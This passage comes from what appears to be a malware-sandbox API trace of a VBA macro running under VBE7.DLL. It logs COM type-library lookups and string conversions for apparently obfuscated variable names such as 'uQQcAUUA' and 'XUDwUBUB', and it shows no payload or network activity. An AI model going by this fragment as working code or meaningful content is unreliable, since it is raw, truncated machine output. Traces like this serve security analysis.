This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.041] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4cf0000 [0069.042] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.042] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.042] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.042] IUnknown:Release (This=0x665ba50) returned 0xd [0069.042] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.042] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.042] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.042] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.042] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.042] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.042] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.042] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.042] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.042] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.042] IUnknown:Release (This=0x665ba50) returned 0xd [0069.042] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.043] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.043] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61f62, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="uQQcAUUA") returned 9 [0069.043] ITypeComp:RemoteBind (in: This=0x665ba60, szName="uQQcAUUA", lHashVal=0x104c8e, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61f62, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="uQQcAUUA") returned 9 [0069.043] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="uQQcAUUA", lHashVal=0x104c8e, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61f62, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="uQQcAUUA") returned 9 [0069.043] ITypeComp:RemoteBind (in: This=0x665bd30, szName="uQQcAUUA", lHashVal=0x104c8e, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.043] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="uQQcAUUA") returned 0x104c8e [0069.043] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="uQQcAUUA" | out: _Dst="uQQcAUUA") returned 0x0 [0069.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="uQQcAUUA") returned 9 [0069.043] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.043] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="uQQcAUUA", lHashVal=0x104c8e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.043] IUnknown:Release (This=0x665ba50) returned 0xd [0069.043] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.043] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="uQQcAUUA", lHashVal=0x104c8e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.043] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.043] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.043] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="uQQcAUUA", lHashVal=0x104c8e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.043] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.043] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.043] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="uQQcAUUA", lHashVal=0x104c8e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.043] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.044] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61f62, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="uQQcAUUA") returned 9 [0069.044] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="uQQcAUUA", lHashVal=0x104c8e, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.044] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.044] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a61f62 | out: _Dst=0x67c2d40) returned 0x0 [0069.044] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_uQQcAUUA") returned 0x102417 [0069.044] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_uQQcAUUA" | out: _Dst="_B_var_uQQcAUUA") returned 0x0 [0069.044] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_uQQcAUUA") returned 16 [0069.044] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.044] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_uQQcAUUA", lHashVal=0x102417, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.044] IUnknown:Release (This=0x665ba50) returned 0xd [0069.044] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.044] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_uQQcAUUA", lHashVal=0x102417, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.044] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.044] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.044] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_uQQcAUUA", lHashVal=0x102417, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.044] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.044] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.044] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_uQQcAUUA", lHashVal=0x102417, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.044] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.044] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.044] IUnknown:Release (This=0x665ba50) returned 0xd [0069.044] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b10c4e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_uQQcAUUA") returned 16 [0069.044] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_uQQcAUUA", lHashVal=0x102417, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x75005f00720061, ppTypeComp=0x41006300000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x75005f00720061, ppTypeComp=0x41006300000000, pDummy=0x0) returned 0x0 [0069.044] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a61f62 | out: _Dst=0x144ec0) returned 0x0 [0069.045] ITypeComp:RemoteBind (in: This=0x665ba60, szName="lAZcAA", lHashVal=0x10a89e, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.045] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6205a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="lAZcAA") returned 7 [0069.045] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="lAZcAA", lHashVal=0x10a89e, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.045] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6205a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="lAZcAA") returned 7 [0069.045] ITypeComp:RemoteBind (in: This=0x665bd30, szName="lAZcAA", lHashVal=0x10a89e, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.045] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lAZcAA") returned 0x10a89e [0069.045] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="lAZcAA" | out: _Dst="lAZcAA") returned 0x0 [0069.045] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="lAZcAA") returned 7 [0069.045] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.045] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="lAZcAA", lHashVal=0x10a89e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.045] IUnknown:Release (This=0x665ba50) returned 0xd [0069.045] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.045] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="lAZcAA", lHashVal=0x10a89e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.045] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.045] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.045] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="lAZcAA", lHashVal=0x10a89e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.045] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.045] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.045] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="lAZcAA", lHashVal=0x10a89e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.045] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.045] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6205a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="lAZcAA") returned 7 [0069.045] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="lAZcAA", lHashVal=0x10a89e, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.046] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.046] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a6205a | out: _Dst=0x67c2d40) returned 0x0 [0069.046] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_lAZcAA") returned 0x102308 [0069.046] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_lAZcAA" | out: _Dst="_B_var_lAZcAA") returned 0x0 [0069.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_lAZcAA") returned 14 [0069.046] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.046] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_lAZcAA", lHashVal=0x102308, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.046] IUnknown:Release (This=0x665ba50) returned 0xd [0069.046] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.046] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_lAZcAA", lHashVal=0x102308, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.046] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.046] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.046] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_lAZcAA", lHashVal=0x102308, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.046] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.046] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.046] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_lAZcAA", lHashVal=0x102308, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.046] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.046] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.046] IUnknown:Release (This=0x665ba50) returned 0xd [0069.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b10c7e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_lAZcAA") returned 14 [0069.046] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_lAZcAA", lHashVal=0x102308, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6c005f00720061, ppTypeComp=0x41006300000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6c005f00720061, ppTypeComp=0x41006300000000, pDummy=0x0) returned 0x0 [0069.046] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a6205a | out: _Dst=0x144ec0) returned 0x0 [0069.046] ITypeComp:RemoteBind (in: This=0x665ba60, szName="XUDwUBUB", lHashVal=0x1006c5, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6202e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="XUDwUBUB") returned 9 [0069.047] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="XUDwUBUB", lHashVal=0x1006c5, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6202e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="XUDwUBUB") returned 9 [0069.047] ITypeComp:RemoteBind (in: This=0x665bd30, szName="XUDwUBUB", lHashVal=0x1006c5, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.047] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="XUDwUBUB") returned 0x1006c5 [0069.047] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="XUDwUBUB" | out: _Dst="XUDwUBUB") returned 0x0 [0069.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="XUDwUBUB") returned 9 [0069.047] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.047] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="XUDwUBUB", lHashVal=0x1006c5, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.047] IUnknown:Release (This=0x665ba50) returned 0xd [0069.047] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.047] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="XUDwUBUB", lHashVal=0x1006c5, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.047] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.047] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.047] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="XUDwUBUB", lHashVal=0x1006c5, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.047] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.047] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.047] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="XUDwUBUB", lHashVal=0x1006c5, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.047] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6202e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="XUDwUBUB") returned 9 [0069.047] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="XUDwUBUB", lHashVal=0x1006c5, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.047] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.047] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a6202e | out: _Dst=0x67c2d40) returned 0x0 [0069.047] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_XUDwUBUB") returned 0x10de8d [0069.047] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_XUDwUBUB" | out: _Dst="_B_var_XUDwUBUB") returned 0x0 [0069.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_XUDwUBUB") returned 16 [0069.048] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.048] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_XUDwUBUB", lHashVal=0x10de8d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.048] IUnknown:Release (This=0x665ba50) returned 0xd [0069.048] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.048] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_XUDwUBUB", lHashVal=0x10de8d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.048] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.048] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.048] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_XUDwUBUB", lHashVal=0x10de8d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.048] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.048] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.048] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_XUDwUBUB", lHashVal=0x10de8d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.048] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.048] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.048] IUnknown:Release (This=0x665ba50) returned 0xd [0069.048] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b10cae, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_XUDwUBUB") returned 16 [0069.048] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_XUDwUBUB", lHashVal=0x10de8d, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x58005f00720061, ppTypeComp=0x55007700000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x58005f00720061, ppTypeComp=0x55007700000000, pDummy=0x0) returned 0x0 [0069.048] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a6202e | out: _Dst=0x144ec0) returned 0x0 [0069.048] ITypeComp:RemoteBind (in: This=0x665ba60, szName="pADAAX4", lHashVal=0x10f17a, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.048] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62082, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="pADAAX4") returned 8 [0069.048] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="pADAAX4", 